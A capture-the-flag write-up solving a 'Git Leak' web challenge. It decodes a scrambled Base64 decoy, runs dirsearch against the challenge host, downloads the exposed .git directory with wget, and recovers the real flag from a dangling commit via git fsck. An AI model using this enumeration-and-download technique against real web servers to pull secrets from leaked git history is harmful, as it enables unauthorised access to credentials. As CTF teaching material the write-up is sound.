CTF: Git Leak
Challenge description: my bro says he only uses a Linux environment for pentesting
We will solve this challenge on Windows.
Fake Flag in Base64
Open the link and view the page source; the HTML contains comments:
<html>
<head>
<body>
<p>Hello,world!<p>
<p>This is my friend :<!--tig--></p>
<!--flag{Zmxhz19ub3RfaGvyzSEHIQ==}-->
</body>
</head>
</html>
Base64-decode Zmxhz19ub3RfaGvyzSEHIQ==:
flaϟnot_hk⍡!
The decoded result is garbage: the case of some characters in the Base64 string has been scrambled. Brute-forcing the case gives the correct Base64 string:
ZmxhZ19ub3RfaGVyZSEhIq==
# i.e. flag_not_here!!"
Of course, this is a fake flag :)
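The case-recovery step above, as an added Python example (not code from the original writeup): Base64 decodes each 4-character group into 3 bytes independently, so instead of trying all 2**19 case combinations of the whole string, it tries at most 16 per group and keeps only the variants whose bytes are all printable ASCII. The input string is the one from the HTML comment; the printable-ASCII filter is an assumption about what a flag looks like.

```python
import base64
import itertools
from typing import List, Optional

# Constructed input: the case-mangled string from the HTML comment in this writeup.
GARBLED = "Zmxhz19ub3RfaGvyzSEHIQ=="


def decode_printable(b64: str) -> Optional[str]:
    """Decode a Base64 string; return text only if every byte is printable ASCII.

    A flag is expected to be plain text, so any byte outside 0x20..0x7E means at
    least one character in this chunk still has the wrong case.
    """
    try:
        raw = base64.b64decode(b64, validate=True)
    except ValueError:
        return None
    if all(0x20 <= b < 0x7F for b in raw):
        return raw.decode("ascii")
    return None


def case_variants(chunk: str):
    """Yield every re-casing of the letters in a chunk; digits, '+', '/' and '=' stay fixed."""
    options = [(c.lower(), c.upper()) if c.isalpha() else (c,) for c in chunk]
    for combo in itertools.product(*options):
        yield "".join(combo)


def recover_groups(b64: str) -> List[List[str]]:
    """For each 4-character Base64 group, return the case variants that decode to printable text.

    Groups are independent, so the search is at most 2**4 = 16 decodes per group
    instead of 2**19 for the 19 letters of the whole string.
    """
    groups = [b64[i:i + 4] for i in range(0, len(b64), 4)]
    return [[v for v in case_variants(g) if decode_printable(v) is not None] for g in groups]


def recover_strings(b64: str) -> List[str]:
    """Combine one surviving variant per group into full candidate Base64 strings."""
    return ["".join(combo) for combo in itertools.product(*recover_groups(b64))]


if __name__ == "__main__":
    # Show the surviving variants per group, then every full candidate and its plaintext.
    for start, candidates in zip(range(0, len(GARBLED), 4), recover_groups(GARBLED)):
        print(GARBLED[start:start + 4], "->", [(c, decode_printable(c)) for c in candidates])
    for candidate in recover_strings(GARBLED):
        print(candidate, decode_printable(candidate))
```

Several groups keep more than one printable variant (the last group decodes to either "!" or '"'), so the final pick among the candidates is still a human judgement about which text reads as the intended flag.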
Fake Flag in a Directory
Run directory enumeration against the URL, for example with dirsearch:
python dirsearch.py -u http://160.202.254.160:11403/
Output:
Target: http://160.202.254.160:11403/
[22:05:13] Starting:
[22:05:15] 301 - 326B - /.git -> http://160.202.254.160:11403/.git/
[22:05:15] 200 - 14B - /.git/COMMIT_EDITMSG
[22:05:15] 200 - 414B - /.git/branches/
[22:05:15] 200 - 618B - /.git/
[22:05:15] 200 - 133B - /.git/config
[22:05:15] 200 - 73B - /.git/description
[22:05:15] 200 - 23B - /.git/HEAD
[22:05:15] 200 - 597B - /.git/hooks/
[22:05:15] 200 - 198B - /.git/index
[22:05:15] 200 - 460B - /.git/info/
[22:05:15] 200 - 240B - /.git/info/exclude
[22:05:15] 200 - 482B - /.git/logs/
[22:05:15] 200 - 1KB - /.git/logs/HEAD
[22:05:15] 301 - 336B - /.git/logs/refs -> http://160.202.254.160:11403/.git/logs/refs/
[22:05:15] 301 - 342B - /.git/logs/refs/heads -> http://160.202.254.160:11403/.git/logs/refs/heads/
[22:05:15] 200 - 1KB - /.git/logs/refs/heads/master
[22:05:15] 301 - 337B - /.git/refs/heads -> http://160.202.254.160:11403/.git/refs/heads/
[22:05:15] 200 - 463B - /.git/refs/
[22:05:15] 200 - 571B - /.git/objects/
[22:05:15] 200 - 41B - /.git/refs/heads/master
[22:05:15] 301 - 336B - /.git/refs/tags -> http://160.202.254.160:11403/.git/refs/tags/
[22:05:15] 403 - 283B - /.ht_wsr.txt
[22:05:15] 403 - 283B - /.htaccess.bak1
[22:05:15] 403 - 283B - /.htaccess.sample
[22:05:15] 403 - 283B - /.htaccess.orig
[22:05:15] 403 - 283B - /.htaccessBAK
[22:05:15] 403 - 283B - /.htaccess_extra
[22:05:15] 403 - 283B - /.htaccess_sc
[22:05:15] 403 - 283B - /.htaccessOLD
[22:05:15] 403 - 283B - /.htaccess_orig
[22:05:15] 403 - 283B - /.html
[22:05:15] 403 - 283B - /.htm
[22:05:16] 403 - 283B - /.htpasswds
[22:05:16] 403 - 283B - /.httr-oauth
[22:05:16] 403 - 283B - /.htpasswd_test
[22:05:16] 403 - 283B - /.php
[22:05:17] 403 - 283B - /.htaccess.save
[22:05:17] 403 - 283B - /.htaccessOLD2
[22:05:26] 200 - 32B - /flag.txt
[22:05:33] 403 - 283B - /server-status/
[22:05:33] 403 - 283B - /server-status
Task Completed
A flag.txt under the web root returns 200; visit http://160.202.254.160:11403/flag.txt:
flag{hahahahahhahahahahnotflag}
Another fake flag :)
Fake Flag in Git
The HTML also contains another comment:
<p>This is my friend :<!--tig--></p>
tig is a text-mode interface for git, used to browse Git history and view branches and commits. So this challenge probably has something to do with Git.
The site exposes a .git directory. Download it, for example with GNU Wget for Windows:
wget -r http://160.202.254.160:11403/.git/
Enter the 160.202.254.160+11403 directory and view the commit history with git:
git log
Output:
commit d256328b55ccd8c985237e870a16a3e840f2aa2a (HEAD -> master)
Author: vFREE <flag@flag.com>
Date: Sun Jan 17 20:30:53 2021 +0800
flag is here?
commit e0b8e8e2df0e08f9719df35b8cf68ab4cbd8d3b0
Author: vFREE <flag@flag.com>
Date: Sun Jan 17 20:30:09 2021 +0800
this is index.html
View the contents of the first commit:
git show d256328b55ccd8c985237e870a16a3e840f2aa2a
Output:
commit d256328b55ccd8c985237e870a16a3e840f2aa2a (HEAD -> master)
Author: vFREE <flag@flag.com>
Date: Sun Jan 17 20:30:53 2021 +0800
flag is here?
diff --git a/flag.txt b/flag.txt
new file mode 100644
index 0000000..6c4cfd1
--- /dev/null
+++ b/flag.txt
@@ -0,0 +1 @@
+flag{not_here}
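Review bot: flag.txt commits a flag-format token in plaintext; anything committed here becomes a permanent object under .git/objects, so if this were a real secret it would have to be removed from history and rotated, not merely edited out in a later commit.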
flag{not_here}, another fake flag :)
The Real Flag
Git has what is called a dangling commit, something commonly seen in damaged Git repositories. Put simply, it is an "abandoned" snapshot: it still fully preserves the project state, author information and commit message of that moment, but no "bookmark" (branch name) points to it any more.
git log does not show such commits, but git fsck can find them:
git fsck --lost-found
Output:
# preceding lines omitted
error: refs/tags/index.html@C=N;O=D: invalid sha1 pointer 0000000000000000000000000000000000000000
error: refs/tags/index.html@C=S;O=A: invalid sha1 pointer 0000000000000000000000000000000000000000
error: refs/tags/index.html@C=S;O=D: invalid sha1 pointer 0000000000000000000000000000000000000000
dangling commit 40c6d51b81775a1590c1b051d9562222e41c4741
dangling commit 13ce8d0d982aee1efdbc42cbae0acdaaf29d5aa1
There are two dangling commits. Look at the first one by its hash:
git show 40c6d51b81775a1590c1b051d9562222e41c4741
Output:
commit 40c6d51b81775a1590c1b051d9562222e41c4741
Author: vFREE <flag@flag.com>
Date: Sun Jan 17 20:34:43 2021 +0800
flag is here?
diff --git a/flag.txt b/flag.txt
index aa6f6dc..726e5d1 100644
--- a/flag.txt
+++ b/flag.txt
@@ -1 +1 @@
-flag{nonono}
+flag{git_is_good_distributed_version_control_system}
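Review bot: overwriting flag{nonono} with a new value does not retire the old one; blob aa6f6dc stays in the object store, and this commit, reachable from no branch, is still recovered by git fsck above, so both values remain readable to anyone who obtains the .git directory. A leaked value should be treated as compromised and rotated.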
flag{git_is_good_distributed_version_control_system} is the real flag.
Takeaways
A fun CTF challenge. Some site administrators leave a .git directory on the web server for convenience, or fail to restrict access to it. Even when the sensitive information has been removed from the current web application, the git history may still hold API keys, account credentials and other secrets left over from testing.